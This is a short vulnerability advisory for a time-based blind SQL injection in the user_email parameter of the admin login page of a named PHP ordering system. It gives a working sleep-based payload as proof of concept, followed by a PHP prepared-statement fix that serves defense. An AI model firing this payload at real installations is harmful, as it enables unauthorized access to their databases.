Online Ordering System By janobe - SQL injection vulnerability
- Exploit Author: zerrr0
Vendor Homepage
Description
- Due to lack of protection, the parameter user_email in Online Ordering System By janobe v2.3.2 /admin/login.php can be abused to inject SQL queries to extract information from databases.
- Vulnerability file: /admin/login.php
- Parameter: user_email
Proof of Concept (PoC):
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_email=admin' AND (SELECT 5888 FROM (SELECT(SLEEP(5)))eEFG) AND 'BaRZ'='BaRZ&user_pass=admin&btnLogin=
---
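Mitigation sketch, added here as an example and not taken from the vendor's code: a login lookup that binds user_email as a parameter, so the payload above is compared as a literal string instead of being parsed as SQL. The table and column names (users, email, pass_hash), the function name find_admin, the session key, the connection settings and the use of password_hash() for stored passwords are all assumptions.

```php
<?php
// Hardened login lookup (added example; not the vendor's code).
// Assumptions: a `users` table with `id`, `email` and `pass_hash` columns,
// hashes created with password_hash(), and constructed connection settings.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function find_admin(mysqli $db, string $email, string $password): ?array
{
    // Cap the length so oversized input never reaches the database.
    if ($email === '' || strlen($email) > 254) {
        return null;
    }

    // The value travels separately from the SQL text, so quotes, SLEEP()
    // or subqueries inside $email are matched as plain characters.
    $stmt = $db->prepare(
        'SELECT id, email, pass_hash FROM users WHERE email = ? LIMIT 1'
    );
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Check the password in PHP instead of inside the WHERE clause.
    if (!$row || !password_verify($password, $row['pass_hash'])) {
        return null;
    }
    unset($row['pass_hash']);
    return $row;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['btnLogin'])) {
    // Constructed connection values; use a least-privilege database account.
    $db = new mysqli('127.0.0.1', 'app_user', 'app_password', 'app_db');

    // Accept only scalar strings; array-valued fields are treated as empty.
    $email = is_string($_POST['user_email'] ?? null) ? $_POST['user_email'] : '';
    $pass  = is_string($_POST['user_pass'] ?? null) ? $_POST['user_pass'] : '';

    $user = find_admin($db, $email, $pass);
    if ($user === null) {
        http_response_code(401);
        exit('Invalid credentials');
    }
    session_start();
    session_regenerate_id(true); // new session id after authentication
    $_SESSION['admin_id'] = $user['id'];
}
```

With the bound parameter, the PoC value reaches MySQL as data only: no row has that string as its email, so no delay is introduced and the request is rejected with 401.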
